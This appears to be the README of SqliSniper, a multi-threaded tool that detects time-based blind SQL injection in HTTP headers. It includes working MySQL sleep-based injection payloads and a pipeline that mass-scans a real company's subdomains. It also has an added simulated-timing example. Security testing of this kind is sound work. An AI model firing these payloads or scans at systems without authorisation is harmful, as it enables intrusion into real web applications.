SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives and send alerts upon detection, with the built-in Discord notification functionality.
Key Features
- Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
- Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
- Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
- False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
- Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.
Installation
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt
The -h flag displays help for the tool. Here are all the options it supports.
ubuntu:~/sqlisniper$ ./sqlisniper.py -h
███████╗ ██████╗ ██╗ ██╗ ███████╗███╗ ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║ ██║ ██╔════╝████╗ ██║██║██╔══██╗██╔════╝██╔══██╗
██████╗██║ ██║██║ ██║ ███████╗██╔██╗ ██║██║██████╔╝█████╗ ██████╔╝
╚════██║██║▄▄ ██║██║ ██║ ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝ ██╔══██╗
███████║╚██ ███╔╝███████╗██║ ███████║██║ ╚████║██║██║ ███████╗██║ ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═══╝╚═╝╚═╝ ╚══════╝╚═╝ ╚═╝
-: By Muhammad Danial :-
usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]
Detect SQL injection by sending malicious queries
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads
Single URL Scan
The URL can be provided with the -u flag for a single-site scan.
./sqlisniper.py -u http://example.com
File Input
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
Piping URLs
SqliSniper can also work with pipeline input using the -p flag.
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can use tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
Scanning with Custom Payloads
By default, SqliSniper uses the payloads.txt file. However, the --payload flag can be used to provide a custom payloads file.
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
When using a custom payloads file, ensure that you replace the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.
ubuntu:~/sqlisniper$ cat payloads.txt
0"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
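The reason the placeholder matters is that a finding is only credible when the extra response delay tracks each sleep value that was substituted in. The following is an added example of that check, not SqliSniper's own code: render, confirm_delay and the three simulated targets are hypothetical names, the timings are constructed, and no requests are sent.

```python
import re
from statistics import median

PLACEHOLDER = "%__TIME_OUT__%"
# Payload template taken from the payloads.txt listing above.
TEMPLATE = "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

def render(template, seconds):
    """Substitute the sleep placeholder; reject templates that lack it."""
    if PLACEHOLDER not in template:
        raise ValueError("payload template is missing " + PLACEHOLDER)
    return template.replace(PLACEHOLDER, str(seconds))

def confirm_delay(measure, template, sleeps=(3, 6, 9), tolerance=1.0):
    """True only if the added delay matches every requested sleep value.

    measure(header_value) -> elapsed seconds (hypothetical callback).
    """
    baseline = median(measure("") for _ in range(3))
    for seconds in sleeps:
        added = measure(render(template, seconds)) - baseline
        if abs(added - seconds) > tolerance:
            return False  # delay does not track the payload: not a finding
    return True

# --- Constructed stand-ins for a target; no network traffic is sent ---
def vulnerable(value):
    m = re.search(r"sleep\((\d+)\)", value)
    return 0.2 + (int(m.group(1)) if m else 0)

def slow(value):
    return 5.1  # always slow, regardless of the header value

def spiky():
    timings = iter([0.2, 0.2, 0.2, 3.3, 0.2, 0.2])  # one latency spike
    return lambda value: next(timings)

def demo():
    return {
        "vulnerable": confirm_delay(vulnerable, TEMPLATE),
        "slow": confirm_delay(slow, TEMPLATE),
        "spiky, one sleep value": confirm_delay(spiky(), TEMPLATE, sleeps=(3,)),
        "spiky, three sleep values": confirm_delay(spiky(), TEMPLATE),
    }

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

A single latency spike passes a one-value check but is rejected once three different sleep values must all be matched, which is also why jitter from heavy concurrency degrades accuracy.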
Scanning with a Single Payload
If you want to test with only a single payload, the --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%.
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
Scanning Custom Headers
Headers are stored in the file headers.txt. To scan a custom header, save the custom HTTP request header in the headers.txt file.
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
Sending Discord Alert Notifications
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
./sqlisniper.py -r url.txt --discord <web_hookurl>
Multi-Threading
Threads can be defined with the --threads flag.
./sqlisniper.py -r url.txt --threads 10
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.